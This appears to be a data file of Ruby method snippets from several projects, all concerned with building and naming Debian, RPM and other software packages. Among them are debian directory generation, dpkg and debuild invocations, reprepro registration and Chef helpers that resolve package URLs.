"def generate_debian_dir(pkginfo, dir, options)\n options, unknown_options = Kernel.filter_options options,\n :distribution => nil,\n :override_existing => true,\n :patch_dir => nil\n\n distribution = options[:distribution]\n\n # Prepare fields for template\n package_info = pkginfo\n debian_name = debian_name(pkginfo)\n debian_version = debian_version(pkginfo, distribution)\n versioned_name = versioned_name(pkginfo, distribution)\n short_documentation = pkginfo.short_documentation\n documentation = pkginfo.documentation\n origin_information = pkginfo.origin_information\n source_files = pkginfo.source_files\n\n upstream_name = pkginfo.name\n copyright = pkginfo.copyright\n license = pkginfo.licenses\n\n deps = @dep_manager.filtered_dependencies(pkginfo)\n\n #debian names of rock packages\n deps_rock_packages = deps[:rock]\n deps_osdeps_packages = deps[:osdeps]\n deps_nonnative_packages = deps[:nonnative].to_a.flatten.compact\n\n dependencies = (deps_rock_packages + deps_osdeps_packages + deps_nonnative_packages).flatten\n build_dependencies = dependencies.dup\n\n this_rock_release = TargetPlatform.new(rock_release_name, target_platform.architecture)\n @rock_autobuild_deps[pkginfo.build_type].each do |pkginfo|\n name = debian_name(pkginfo)\n build_dependencies << this_rock_release.packageReleaseName(name)\n end\n\n # To handle postinstall\n DEFAULT_BUILD_DEPENDENCIES.each do |dep|\n build_dependencies << dep\n end\n\n DEFAULT_RUNTIME_DEPENDENCIES.each do |dep|\n dependencies << dep\n end\n\n if pkginfo.build_type == :cmake\n build_dependencies << \"cmake\"\n elsif pkginfo.build_type == :orogen\n build_dependencies << \"cmake\"\n orogen_command = pkginfo.orogen_command\n elsif pkginfo.build_type == :autotools\n if pkginfo.using_libtool\n build_dependencies << \"libtool\"\n end\n build_dependencies << \"autotools-dev\" # as autotools seems to be virtual...\n build_dependencies << \"autoconf\"\n build_dependencies << \"automake\"\n build_dependencies << \"dh-autoreconf\"\n elsif pkginfo.build_type == :ruby\n if pkginfo.is_bundle?\n build_dependencies << \"cmake\"\n else\n raise \"debian/control: cannot handle ruby package\"\n end\n elsif pkginfo.build_type == :archive_importer || pkginfo.build_type == :importer_package\n build_dependencies << \"cmake\"\n else\n raise \"debian/control: cannot handle package type #{pkginfo.build_type} for #{pkginfo.name}\"\n end\n\n Packager.info \"Required OS Deps: #{deps_osdeps_packages}\"\n Packager.info \"Required Nonnative Deps: #{deps_nonnative_packages}\"\n\n dir = cleanup_existing_dir(dir, options)\n existing_debian_dir = File.join(pkginfo.srcdir,\"debian\")\n template_dir =\n if File.directory?(existing_debian_dir)\n existing_debian_dir\n else\n TEMPLATES\n end\n FileUtils.mkdir_p dir\n\n Find.find(template_dir) do |path|\n next if File.directory?(path)\n template = ERB.new(File.read(path), nil, \"%<>\", path.gsub(/[^w]/, '_'))\n rendered = template.result(binding)\n\n target_path = File.join(dir, Pathname.new(path).relative_path_from(Pathname.new(template_dir)).to_s)\n FileUtils.mkdir_p File.dirname(target_path)\n File.open(target_path, \"w\") do |io|\n io.write(rendered)\n end\n end\n\n if options[:patch_dir]\n whitelist = [ \"debian/rules\",\"debian/control\",\"debian/install\" ]\n if patch_pkg_dir(pkginfo.name, options[:patch_dir],\n whitelist: whitelist,\n pkg_dir: pkginfo.srcdir,\n options: patch_options())\n Packager.warn \"Overlay patch applied to debian folder of #{pkginfo.name}\"\n end\n end\n\n ########################\n # debian/compat\n 
########################\n compatfile = File.join(dir,\"compat\")\n set_compat_level(DEBHELPER_DEFAULT_COMPAT_LEVEL, compatfile)\n end",
"def package_dir_path\n \"#{package_dir}/#{package_name}\"\n end",
"def package_dir\r\n \"${0%/#{target_name}}\"\r\n end",
"def package_dir\n config.package_dir\n end",
"def pkg_dir\n @pkg_dir ||= File.join( self.build_dir, \"#{name + ( version ? \"-#{version}\" : \"\" ) }\" )\n end",
"def make(output_dir)\n create_debian_dir\n\n arch = @config.architecture\n package_name = @config.package + \"_#{@config.full_version}_#{arch}.deb\"\n package_path = Pathname.new(output_dir) + package_name\n\n system(\"fakeroot dpkg-deb -b \\\"#{@config.root}\\\" \\\"#{package_path}\\\"\")\n\n package_path\n end",
"def package_filename\n \"#{@package.name}_#{@package.version}_#{@package.architecture}.deb\"\n end",
"def dmg_dir_path\n \"#{package_dir}/#{dmg_name}\"\n end",
"def target_dir\n without_parent_dir ? \".\" : package_name\n end",
"def package_file\n File.join('/tmp/fpm-recipes/duo-openvpn/pkg',\n case node['platform_family']\n when 'debian'\n \"duo-openvpn_#{version}-#{revision}_amd64.deb\"\n when 'rhel'\n \"duo-openvpn-#{version}-#{revision}.x86_64.rpm\"\n end)\n end",
"def debian_meta_name(name, with_rock_release_prefix = true)\n if with_rock_release_prefix\n rock_release_prefix + \"meta-\" + Deb.canonize(name)\n else\n pkg_prefix_base + \"meta-\" + Deb.canonize(name)\n end\n end",
"def package_name\n @package_name ||=\n Pathname(\"#{cartage.final_name}.tar#{cartage.tar_compression_extension}\")\n end",
"def package_meta(name, depend,\n version: \"0.1\",\n force_update: false,\n distribution: nil,\n architecture: nil)\n\n debian_pkg_name = debian_meta_name(name)\n\n if force_update\n dirname = packaging_dir(debian_pkg_name)\n if File.directory?(dirname)\n Packager.info \"Debian: rebuild requested -- removing #{dirname}\"\n FileUtils.rm_rf(dirname)\n end\n end\n\n distribution ||= target_platform.distribution_release_name\n architecture ||= target_platform.architecture\n packaging_dir = packaging_dir(debian_pkg_name)\n\n if not File.directory?(packaging_dir)\n FileUtils.mkdir_p packaging_dir\n end\n\n package_deb_meta(name, depend,\n version: version,\n distribution: distribution,\n packaging_dir: packaging_dir)\n end",
"def package(pkginfo, options = Hash.new)\n options, unknown_options = Kernel.filter_options options,\n :force_update => false,\n :patch_dir => nil,\n :distribution => nil, # allow to override global settings\n :architecture => nil\n\n options[:distribution] ||= target_platform.distribution_release_name\n options[:architecture] ||= target_platform.architecture\n\n debian_pkg_name = debian_name(pkginfo)\n\n if options[:force_update]\n dirname = packaging_dir(pkginfo)\n if File.directory?(dirname)\n Packager.info \"Debian: rebuild requested -- removing #{dirname}\"\n FileUtils.rm_rf(dirname)\n end\n end\n\n options[:packaging_dir] = packaging_dir(pkginfo)\n options[:release_name] = rock_release_name\n\n begin\n # Set the current pkginfo to set the install directory\n # correctly\n # FIXME: needs to be refactored\n #\n @packager_lock.lock\n @current_pkg_info = pkginfo\n\n pkginfo = prepare_source_dir(pkginfo, options.merge(unknown_options))\n\n if pkginfo.build_type == :orogen || pkginfo.build_type == :cmake || pkginfo.build_type == :autotools\n package_default(pkginfo, options)\n elsif pkginfo.build_type == :ruby\n # Import bundles since they do not need to be build and\n # they do not follow the typical structure required for gem2deb\n if pkginfo.name =~ /bundles/\n package_importer(pkginfo, options)\n else\n package_ruby(pkginfo, options)\n end\n elsif pkginfo.build_type == :archive_importer || pkginfo.build_type == :importer_package\n package_importer(pkginfo, options)\n else\n raise ArgumentError, \"Debian: Unsupported package type #{pkginfo.build_type} for #{pkginfo.name}\"\n end\n ensure\n @current_pkg_info = nil\n @packager_lock.unlock\n end\n end",
"def package_manifest()\n res = []\n @items.each do |item|\n sources = item[:sources]\n sources = [ sources ] unless sources.kind_of?(Array)\n sources.each do |src|\n # TODO - want to split into multiple packages\n #if pkg == :main\n # next unless item[:dest] =~ /(LIB|BIN)DIR/\n #elsif pkg == :devel\n # next unless item[:dest] =~ /(INCLUDE|MAN)DIR/\n #else\n # throw \"bad pkg type\"\n #end\n dst = expand_dir(item[:dest])\n if item[:rename].nil?\n dst += '/' + src\n else\n dst += '/' + item[:rename]\n end\n dst.gsub!(/^\\/usr\\/local\\//, '/usr/') # KLUDGE: only true when making an RPM or DEB\n res.push dst\n end\n end\n res.join \"\\n\"\n end",
"def pathDist\n\t\"../../\" + distPackageName + \"_\" + version + \"/\"\nend",
"def get_extract_dir(pkg, version, update)\n dir = \"#{pkg == 'jre' ? 'jre' : 'jdk'}1.#{version}.0#{update.empty? ? '' : '_'+update}\"\n Chef::Log.info(\"Java package expanded dir: #{dir}\")\n dir\n end",
"def debian_name(pkg)\n if pkg.kind_of?(Autoproj::RubyPackage)\n debian_ruby_name(pkg.name)\n else\n \"rock-\" + canonize(pkg.name)\n end\n end",
"def pkg_dir=( pd )\n @pkg_dir = File.join( self.build_dir, pd )\n end",
"def package_build!(tmp_dir)\n # copying template files\n FileUtils.cp_r(File.expand_path(File.join(File.dirname(__FILE__), \"debian\")), tmp_dir)\n Dir.chdir(tmp_dir) do\n ppath = File.join(\"..\", self.package_filename)\n File.delete(ppath) if File.exists? ppath\n deb_files = File.join(\"..\", \"#{@package.name}_#{@package.version}*\")\n res = run_dpkg tmp_dir, @package.gpg_key \n if res or File.exists? ppath \n # mv can raise\n FileUtils.mv(Dir.glob(deb_files) , @dest_dir, :force => true)\n else\n ActiveRecord::Base.logger.debug \"Dpkg-buildpackage failed\"\n raise \"dpkg-buildpackage failed\"\n end\n end\n end",
"def tar_path\n File.expand_path(@env[\"package.output\"], FileUtils.pwd)\n end",
"def directory\n return _meta_data['directory'] if _meta_data.has_key? 'directory'\n dir\n end",
"def dmg_package_app\n case new_resource.source\n when :direct\n ::File.basename(package_metadata[:url], '.dmg')\n else\n ::File.basename(new_resource.source.to_s, '.dmg')\n end\n end",
"def output_package(pkg_type)\n case pkg_type\n when 'makeself'\n \"#{package_name}-#{build_version}_#{iteration}.sh\"\n when 'msi'\n Packager::WindowsMsi.new(self).package_name\n when 'bff'\n \"#{package_name}.#{bff_version}.bff\"\n when 'pkgmk'\n \"#{package_name}-#{build_version}-#{iteration}.solaris\"\n when 'mac_pkg'\n Packager::MacPkg.new(self).package_name\n when 'mac_dmg'\n pkg = Packager::MacPkg.new(self)\n Packager::MacDmg.new(pkg).package_name\n else # fpm\n require \"fpm/package/#{pkg_type}\"\n pkg = FPM::Package.types[pkg_type].new\n pkg.version = build_version\n pkg.name = package_name\n pkg.iteration = iteration\n if pkg_type == 'solaris'\n pkg.to_s('NAME.FULLVERSION.ARCH.TYPE')\n else\n pkg.to_s\n end\n end\n end",
"def update_debian_dir(pkginfo, options)\n # Generate the debian directory\n generate_debian_dir(pkginfo, pkginfo.srcdir, options)\n\n if options[:patch_dir] && File.exist?(options[:patch_dir])\n if patch_pkg_dir(pkginfo.name, options[:patch_dir],\n whitelist: nil,\n pkg_dir: pkginfo.srcdir,\n options: patch_options())\n Packager.warn \"Overlay patch applied to #{pkginfo.name}\"\n end\n Dir.chdir(pkginfo.srcdir) do\n process_apaka_control(\"apaka.control\")\n end\n end\n\n dpkg_commit_changes(\"overlay\", pkginfo.srcdir,\n logfile: options[:logfile],\n include_removal: true)\n\n envyml = File.join(pkginfo.srcdir, \"env.yml\")\n Packager.warn(\"Preparing env.yml #{envyml}\")\n patch_yml = {}\n if File.exists?(envyml)\n patch_yml = YAML.load_file(envyml)\n end\n\n env_data = pkginfo.generate_env_data(\"APAKA__\" + Packaging.as_var_name(pkginfo.name), rock_install_directory, base_data: patch_yml)\n File.open(envyml, \"w\") do |file|\n file.write(env_data.to_yaml)\n end\n dpkg_commit_changes(\"envyml\", pkginfo.srcdir,\n logfile: options[:logfile])\n\n\n envsh = File.join(pkginfo.srcdir, \"env.sh\")\n Packager.warn(\"Preparing env.sh #{envsh}\")\n File.open(envsh, \"a\") do |file|\n env_txt = pkginfo.envsh(env_data)\n file.write(env_txt)\n end\n dpkg_commit_changes(\"envsh\", pkginfo.srcdir,\n logfile: options[:logfile])\n\n\n # Run dpkg-source\n # Use the new tar ball as source\n if !system(\"dpkg-source\", \"-I\", \"-b\", pkginfo.srcdir,\n [:out, :err] => redirection(options[:logfile],\"a\"),\n :close_others => true)\n Packager.warn \"Package: #{pkginfo.name} failed to perform dpkg-source -- #{Dir.entries(pkginfo.srcdir)}\"\n raise RuntimeError, \"Debian: #{pkginfo.name} failed to perform dpkg-source in #{pkginfo.srcdir}\"\n end\n [\"#{versioned_name(pkginfo, options[:distribution])}.debian.tar.gz\",\n \"#{plain_versioned_name(pkginfo)}.orig.tar.gz\",\n \"#{versioned_name(pkginfo, options[:distribution])}.dsc\"]\n end",
"def build_local(pkg_name, debian_pkg_name, versioned_build_dir, deb_filename, options)\n options, unknown_options = Kernel.filter_options options,\n :distributions => nil,\n :parallel_build_level => nil\n filepath = build_dir\n # cd package_name\n # tar -xf package_name_0.0.debian.tar.gz\n # tar -xf package_name_0.0.orig.tar.gz\n # mv debian/ package_name_0.0/\n # cd package_name_0.0/\n # debuild -us -uc\n # #to install\n # cd ..\n # sudo dpkg -i package_name_0.0.deb\n Packager.info \"Building #{pkg_name} locally with arguments: pkg_name #{pkg_name},\" \\\n \" debian_pkg_name #{debian_pkg_name},\" \\\n \" versioned_build_dir #{versioned_build_dir}\" \\\n \" deb_filename #{deb_filename}\" \\\n \" options #{options}\"\n\n begin\n FileUtils.chdir File.join(build_dir, debian_pkg_name, target_platform.to_s.gsub(\"/\",\"-\")) do\n if File.exist? \"debian\"\n FileUtils.rm_rf \"debian\"\n end\n if File.exist? versioned_build_dir\n FileUtils.rm_rf versioned_build_dir\n end\n FileUtils.mkdir versioned_build_dir\n\n debian_tar_gz = Dir.glob(\"*.debian.tar.gz\")\n debian_tar_gz.concat Dir.glob(\"*.debian.tar.xz\")\n if debian_tar_gz.empty?\n raise RuntimeError, \"#{self} could not find file: *.debian.tar.gz in #{Dir.pwd}\"\n else\n debian_tar_gz = debian_tar_gz.first\n cmd = [\"tar\", \"-xf\", debian_tar_gz]\n if !system(*cmd, :close_others => true)\n raise RuntimeError, \"Packager: '#{cmd.join(\" \")}' failed\"\n end\n end\n\n orig_tar_gz = Dir.glob(\"*.orig.tar.gz\")\n if orig_tar_gz.empty?\n raise RuntimeError, \"#{self} could not find file: *.orig.tar.gz in #{Dir.pwd}\"\n else\n orig_tar_gz = orig_tar_gz.first\n cmd = [\"tar\"]\n cmd << \"-x\" << \"--strip-components=1\" <<\n \"-C\" << versioned_build_dir <<\n \"-f\" << orig_tar_gz\n if !system(*cmd, :close_others => true)\n raise RuntimeError, \"Packager: '#{cmd.join(\" \")}' failed\"\n end\n end\n\n FileUtils.mv 'debian', versioned_build_dir + '/'\n FileUtils.chdir versioned_build_dir do\n cmd = [\"debuild\", \"-us\", \"-uc\"]\n if options[:parallel_build_level]\n cmd << \"-j#{options[:parallel_build_level]}\"\n end\n if !system(*cmd, :close_others => true)\n raise RuntimeError, \"Packager: '#{cmd}' failed\"\n end\n end\n\n filepath = Dir.glob(\"*.deb\")\n if filepath.size < 1\n raise RuntimeError, \"No debian file generated in #{Dir.pwd}\"\n elsif filepath.size > 1\n raise RuntimeError, \"More than one debian file available in #{Dir.pwd}: #{filepath}\"\n else\n filepath = filepath.first\n end\n end\n rescue Exception => e\n msg = \"Package #{pkg_name} has not been packaged -- #{e}\"\n Packager.error msg\n raise RuntimeError, msg\n end\n filepath\n end",
"def pkg_path\n \"pkg/#{spec.full_name}\"\n end",
"def build\n @log.info \"Packaging files\"\n pkgdir = File.join(@path, \"pkg\")\n FileUtils.mkdir_p pkgdir\n\n FileUtils.chmod(0755, Dir[\"#{Ian.debpath(@dir)}/*\"])\n FileUtils.chmod(0755, Ian.debpath(@dir))\n\n pkg = File.join(pkgdir, \"#{pkgname}.deb\")\n output = %x[fakeroot dpkg-deb -b #{@dir} #{pkg}]\n\n return [$?.success?, pkg, output]\n end",
"def package_name\n name = package_drop_last(slug_parts)\n name.empty? ? '_root_' : name\n end",
"def generate_from_directory_package(location)\n files = []\n\n # package files\n package_info = Package::PackageScanner.scan(location)\n files << \"pione-package.json\"\n files += package_info.filepaths\n\n # scenario files\n scenario_infos = package_info.scenarios.map do |scenario|\n files << File.join(scenario, \"pione-scenario.json\")\n files += Package::ScenarioScanner.scan(location + scenario).filepaths.map do |path|\n File.join(scenario, path)\n end\n end\n\n # make seed string for digest\n seed = files.sort.each_with_object(\"\") do |filepath, string|\n digest = Digest::MD5.file((location + filepath).path).to_s\n string << \"%s %s\\n\" % [filepath, digest]\n end\n\n return Digest::MD5.hexdigest(seed)\n end",
"def generate_pkg_contents\n shellout!(\"pkgsend generate #{source_dir} | pkgfmt > #{pkg_manifest_file}.1\")\n shellout!(\"pkgmogrify -DARCH=`uname -p` #{pkg_manifest_file}.1 #{pkg_metadata_file} #{transform_file} | pkgfmt > #{pkg_manifest_file}.2\")\n end",
"def source_package_dir\n Settings.source_dir #% [@program, @version]\n end",
"def source_package_dir\n Settings.source_dir #% [@program, @version]\n end",
"def nuget_directory()\r\n dirs = FileList.new([:lib, :content, :tools].collect{ |dir|\r\n File.join(Folders[:nuspec], \"#{dir}\")\r\n })\r\n task :nuget_dirs => dirs # NOTE: here a new dynamic task is defined\r\n\tdirs.to_a.each{ |d| directory d }\r\n end",
"def get_java_pkg_location\n cookbook = node.app_name.downcase\n base_url = get_mirror_svc('jdk')\n\n version = node.java.version\n update = get_update_ver\n pkg = node.java.jrejdk\n extn = get_pkg_extn\n artifact = \"#{version}u#{update}-linux\"\n\n # Replace any $version/$flavor/$jrejdk placeholder variables present in the URL\n # e.x: http://<mirror>/some/path/$flavor/$jrejdk/$version/$jrejdk-$version-$arch.$extn\n base_url = base_url.gsub('$version', artifact)\n .gsub('$jrejdk', pkg)\n .gsub('$flavor', node[cookbook][:flavor])\n .gsub('$arch', node.java.arch)\n .gsub('$extn', extn)\n exit_with_err(\"Invalid package base URL: #{base_url}\") unless url_valid?(base_url)\n\n if base_url.end_with? (extn)\n # Got full mirror url with file name.\n file_name = File.basename(URI.parse(base_url).path)\n base_url = File.dirname(base_url)\n else\n # Use JDK file name convention.\n file_name = \"#{pkg}-#{artifact}-#{node.java.arch}.#{extn}\"\n end\n\n Chef::Log.info(\"Package url: #{base_url}/#{file_name}\")\n extract_dir = get_extract_dir(pkg, version, update)\n return base_url, file_name, extract_dir\n\n end",
"def default_dev_package\n # Check for an override.\n return dev_package_overrides[package_name] if dev_package_overrides.include?(package_name)\n suffix = node.value_for_platform_family(debian: '-dev', rhel: '-devel', fedora: '-devel')\n # Platforms like Arch and Gentoo don't need this anyway. I've got no\n # clue how Amazon Linux does this.\n if suffix\n package_name + suffix\n else\n nil\n end\n end",
"def gen_dir\n File.join(root_path, 'generated')\n end",
"def debian_name(pkginfo, with_rock_release_prefix = true, release_name = nil)\n if pkginfo.kind_of?(String)\n raise ArgumentError, \"method debian_name expects a PackageInfo as argument, got: #{pkginfo.class} '#{pkginfo}'\"\n end\n name = pkginfo.name\n\n debianize_name(name,\n build_type: pkginfo.build_type,\n with_rock_release_prefix: with_rock_release_prefix,\n release_name: release_name)\n end",
"def _DISTFILESDIR; Config._DISTFILES; end",
"def pkg_metadata_file\n @pkg_metadata_file ||= File.join(staging_dir, \"gen.manifestfile\")\n end",
"def output_package(pkg_type)\n case pkg_type\n when 'makeself'\n Packager::Makeself.new(self).package_name\n when 'msi'\n Packager::MSI.new(self).package_name\n when 'bff'\n Packager::BFF.new(self).package_name\n when 'solaris'\n Packager::Solaris.new(self).package_name\n when 'pkg'\n Packager::PKG.new(self).package_name\n when 'mac_dmg'\n pkg = Packager::PKG.new(self)\n Packager::MacDmg.new(pkg).package_name\n when 'rpm'\n Packager::RPM.new(self).package_name\n when 'deb'\n Packager::DEB.new(self).package_name\n else\n raise RuntimeError, \"I do not know how to build a `#{pkg_type}'!\"\n end\n end",
"def pkg_manifest_file\n @pkg_manifest_file ||= File.join(staging_dir, \"#{safe_base_package_name}.p5m\")\n end",
"def debianize_name(name, build_type: :cmake, with_rock_release_prefix: true, release_name: rock_release_name)\n if build_type == :ruby\n if with_rock_release_prefix\n rock_release_prefix(release_name) + \"ruby-\" + Deb.canonize(name)\n else\n pkg_prefix_base + \"-ruby-\" + Deb.canonize(name)\n end\n else\n if with_rock_release_prefix\n rock_release_prefix(release_name) + Deb.canonize(name)\n else\n pkg_prefix_base + \"-\" + Deb.canonize(name)\n end\n end\n end",
"def register_debian_package(debian_pkg_file, release_name, codename, force = false)\n begin\n reprepro_dir = File.join(deb_repository, release_name)\n\n debian_package_dir = File.dirname(debian_pkg_file)\n debfile = File.basename(debian_pkg_file)\n debian_pkg_name = debfile.split(\"_\").first\n logfile = File.join(log_dir,\"#{debian_pkg_name}-reprepro.log\")\n\n if force\n deregister_debian_package(debian_pkg_name, release_name, codename, true)\n end\n @reprepro_lock.lock\n Dir.chdir(debian_package_dir) do\n if !File.exists?(debfile)\n raise ArgumentError, \"Apaka::Packaging::register_debian_package: could not find '#{debfile}' in directory: '#{debian_package_dir}'\"\n end\n\n cmd = [reprepro_bin]\n cmd << \"-V\" << \"-b\" << reprepro_dir <<\n \"includedeb\" << codename << debfile\n\n Packager.info \"Register deb file: #{cmd.join(\" \")} &>> #{logfile}\"\n if !system(*cmd, [:out, :err] => [logfile, \"a\"], :close_others => true)\n raise RuntimeError, \"Execution of #{cmd.join(\" \")} failed -- see #{logfile}\"\n end\n\n if not reprepro_has_dsc?(debian_pkg_name, release_name, codename, true)\n dscfile = Dir.glob(\"*.dsc\").first\n cmd = [reprepro_bin]\n cmd << \"-V\" << \"-b\" << reprepro_dir <<\n \"includedsc\" << codename << dscfile\n Packager.info \"Register dsc file: #{cmd.join(\" \")} &>> #{logfile}\"\n if !system(*cmd, [:out, :err] => [logfile, \"a\"], :close_others => true)\n raise RuntimeError, \"Execution of #{cmd.join(\" \")} failed -- see #{logfile}\"\n end\n end\n end\n ensure\n @reprepro_lock.unlock\n end\n end",
"def tailor_package_to_platform\n @package.app('Dropbox')\n @package.volumes_dir('Dropbox Installer')\n @package.source(URI.encode(\"file://#{download_dest}\"))\n end",
"def simp_target_dir(subdir=File.join('simp','modules'))\n install_target = puppet_codedir\n\n if install_target.empty?\n fail('Error: Could not find a Puppet code directory for installation')\n end\n\n install_target = File.join(install_target,'environments', subdir)\n\n return install_target\nend",
"def build_package_tasks(config)\n # The name of the task to build the package\n package_task_name = \"build_#{config[:package_name]}\"\n\n # Add task name to the list of dependencies for the :deb_packages task\n task :deb_packages => package_task_name\n\n # The path to the package source directory\n pkg_src_dir = File.join(PACKAGE_CONSTRUCTION_DIR, source_dir_name(config))\n\n # Directory task to ensure the existence of the directory\n directory pkg_src_dir\n\n # Create the tarball task\n orig_source_tarball_path = File.join(PACKAGE_CONSTRUCTION_DIR, \"#{orig_tar_ball_name(config)}.orig.tar.gz\")\n\n # The File task to construct the original source tarball.\n file orig_source_tarball_path => PACKAGE_CONSTRUCTION_DIR do\n system \"tar zcf #{orig_source_tarball_path} --directory #{PACKAGE_CONSTRUCTION_DIR} #{source_dir_name(config)}\"\n end\n\n # The path to the debian directory within the extracted source directory\n package_debian_path = File.join(pkg_src_dir, 'debian')\n\n # Directory task to the package debian path to ensure existence.\n directory package_debian_path\n\n # The task that actually constructs the debian package\n task package_task_name => orig_source_tarball_path do\n # Build the spanky little thing.\n debuild_flag = ENV['debuild'] || 'true'\n if debuild_flag == 'true'\n system \"cd #{pkg_src_dir}; debuild -us -uc\"\n else\n puts \"Skipping build; debug flag was set\"\n end\n end\n\n # Ensure we have set up the tasks for all the files to be included\n # in the package.\n config[:exes].each do | exe_name |\n exe_path = File.join(pkg_src_dir, exe_name.split('.').first)\n file exe_path => pkg_src_dir do\n cp exe_name, exe_path\n end\n\n # Add the file path as a dependency of the source tarball\n task orig_source_tarball_path => exe_path\n end\n\n # Create the task to populate the debian directory\n debian_task = \"populate_#{config[:package_name]}_debian_files\"\n task debian_task => package_debian_path do\n cp_r \"package_source/#{config[:package_name]}/debian\", pkg_src_dir\n end\n\n # Finally add the debian task as a dependency for the package task.\n task package_task_name => debian_task\nend",
"def tar_gz_file\n \"#{package_name}.tar.gz\"\n end",
"def directory_name\n \n directory_name = ''\n if self.pcb_revision != ''\n directory_name = 'pcb' \n directory_name += self.pcb_prefix + '_' \n directory_name += self.pcb_number + '_'\n directory_name += self.pcb_dash_number + '_'\n directory_name += self.pcb_revision\n end\n \n return directory_name\n \n end",
"def pkg_cmd; \"#{pkg_binary}\" end",
"def apt_packages\n PRE_INSTALLED_OS_PACKAGES[@app.release].join(\" #{NL_TAB}\")\n end",
"def build_pkg(dist, arch, deps)\n start_dir = Dir.pwd\n build_dir = \"/tmp/rhobuild\"\n version = Rhoconnect::VERSION\n description = '\"Rhoconnect production environment\"'\n prefix = \"/opt/rhoconnect/installer\"\n gem_name = \"rhoconnect-#{version}.gem\"\n\n before_install_script = \"#{build_dir}/unix-like/pre_install.sh\"\n after_install_script = \"#{build_dir}/unix-like/post_install.sh\"\n before_remove_script = \"#{build_dir}/unix-like/pre_uninstall.sh\"\n after_remove_script = \"#{build_dir}/unix-like/post_uninstall.sh\"\n\n `rm -rf #{build_dir}` if File.exist?(\"#{build_dir}\")\n Dir.mkdir(\"#{build_dir}\")\n Dir.mkdir(\"#{build_dir}/unix-like\")\n\n # Copy all necessary Files into the build_dir\n system(\"cp install.sh Gemfile Gemfile.lock #{build_dir}\")\n system(\"cp -r installer/unix-like/*.sh #{build_dir}/unix-like\")\n system(\"cp -r installer/unix-like/*.rb #{build_dir}/unix-like\")\n system(\"cp pkg/#{gem_name} #{build_dir}\")\n\n # cd into the pkg dir so that fpm will create the package into the pkg dir.\n Dir.chdir(\"./pkg\") # it created by build task and should already exist\n\n # Construct fpm command\n fpm_cmd = \"fpm -s dir -t #{dist} -n rhoconnect -v #{version} -a #{arch} -C #{build_dir} --epoch 1 \" +\n \"--before-install #{before_install_script} --after-install #{after_install_script} \" +\n \"--before-remove #{before_remove_script} --after-remove #{after_remove_script} \" +\n \"--prefix #{prefix} --description #{description}\"\n # Add the list of dependencies to the fpm call\n deps.each { |dep| fpm_cmd << \" -d '#{dep}'\" }\n fpm_cmd << \" './'\"\n # Create the package\n system(fpm_cmd)\n # Leave no trace...\n system(\"rm -rf #{build_dir}\")\n Dir.chdir(start_dir)\nend",
"def package_path(extension='.gem')\n File.join(package_dir, package_basename(extension))\n end",
"def gen_dir(gendir)\n @recipe.gen_dir(gendir.to_s)\n end",
"def package_conf_file(conf_type, name)\n conf_dir = \"/etc/portage/package.#{conf_type}\"\n raise Chef::Exceptions::Package, \"#{conf_type} should be a directory.\" unless ::File.directory?(conf_dir)\n\n package_atom = name.strip.split(/\\s+/).first\n package_file = package_atom.gsub(/[\\/\\.]/, \"-\").gsub(/[^a-z0-9_\\-]/i, \"\")\n return \"#{conf_dir}/chef.#{package_file}\"\n end",
"def public_filename\n \"/packages/#{environment_id}/#{unit_id}/#{installer_item_location}\"\n end",
"def create_directory_cache(ppg_location)\n digest = Util::PackageDigest.generate(ppg_location)\n cache_location = Global.directory_package_cache_directory + digest\n unless cache_location.exist?\n PackageExpander.new(ppg_location).expand(cache_location)\n end\n return digest\n end",
"def get_pkg_location(cookbook)\n\n version = node.etcd.version\n base_url = get_mirror_svc('etcd')\n Chef::Log.info(\"Etcd base_url: #{base_url}\")\n\n # Replace any $version/$arch/$extn placeholder variables present in the URL\n # e.x: https://github.com/coreos/etcd/releases/download/v$version/etcd-v$version-$arch.$extn\n base_url = base_url.gsub('$version', version)\n .gsub('$arch', node.etcd.arch)\n .gsub('$extn', node.etcd.extn)\n exit_with_err(\"Invalid package base URL: #{base_url}\") unless url_valid?(base_url)\n\n file_name = File.basename(URI.parse(base_url).path)\n Chef::Log.info(\"Package url: #{base_url}, filename: #{file_name}\")\n return File.dirname(base_url), file_name\n\n end",
"def get_pkg_location(cookbook)\n\n version = node.etcd.version\n base_url = get_mirror_svc('etcd')\n Chef::Log.info(\"Etcd base_url: #{base_url}\")\n\n # Replace any $version/$arch/$extn placeholder variables present in the URL\n # e.x: https://github.com/coreos/etcd/releases/download/v$version/etcd-v$version-$arch.$extn\n base_url = base_url.gsub('$version', version)\n .gsub('$arch', node.etcd.arch)\n .gsub('$extn', node.etcd.extn)\n exit_with_err(\"Invalid package base URL: #{base_url}\") unless url_valid?(base_url)\n\n file_name = File.basename(URI.parse(base_url).path)\n Chef::Log.info(\"Package url: #{base_url}, filename: #{file_name}\")\n return File.dirname(base_url), file_name\n\n end",
"def path_from_package(package_name)\n ret = package_from_name package_name\n ret && ret.root_path\n end",
"def prepare_source_dir(orig_pkginfo, options = Hash.new)\n pkginfo = orig_pkginfo.dup\n\n options, unknown_options = Kernel.filter_options options,\n :existing_source_dir => nil,\n :packaging_dir => File.join(@build_dir, debian_name(pkginfo))\n\n pkg_dir = options[:packaging_dir]\n if not File.directory?(pkg_dir)\n FileUtils.mkdir_p pkg_dir\n end\n\n # Only when there is no importer or when the VCS supports distribution (here git)\n # then we allow to use the local version\n support_local_import = false\n if !pkginfo.importer_type || pkginfo.importer_type == :git\n Packager.info \"Import from local repository is supported for #{pkginfo.name}\"\n support_local_import = true\n else\n Packager.info \"Import from local repository is not supported for #{pkginfo.name}\"\n end\n\n Packager.debug \"Preparing source dir #{pkginfo.name}\"\n # If we have given an existing source directory we should use it, \n # but only if it is a git repository\n pkg_target_importdir = File.join(pkg_dir, plain_dir_name(pkginfo))\n if support_local_import && existing_source_dir = options[:existing_source_dir]\n import_from_local_src_dir(pkginfo, existing_source_dir, pkg_target_importdir)\n # update to the new srcdir\n pkginfo.srcdir = pkg_target_importdir\n else\n pkginfo.import(pkg_target_importdir)\n end\n # remove these even on fresh imports. some repositories\n # have prepopulated build directories and similar\n remove_excluded_dirs(pkg_target_importdir)\n remove_excluded_files(pkg_target_importdir)\n\n pkginfo\n end",
"def dsym_path\n Dir[BuildCommandGenerator.archive_path + \"/**/*.dsym\"].last\n end",
"def staging_dir\n File.expand_path(\"#{Config.package_tmp}/#{underscore_name}\")\n end",
"def bundled_designs_dir\n Ziya.path( %w[gauges designs] )\n end",
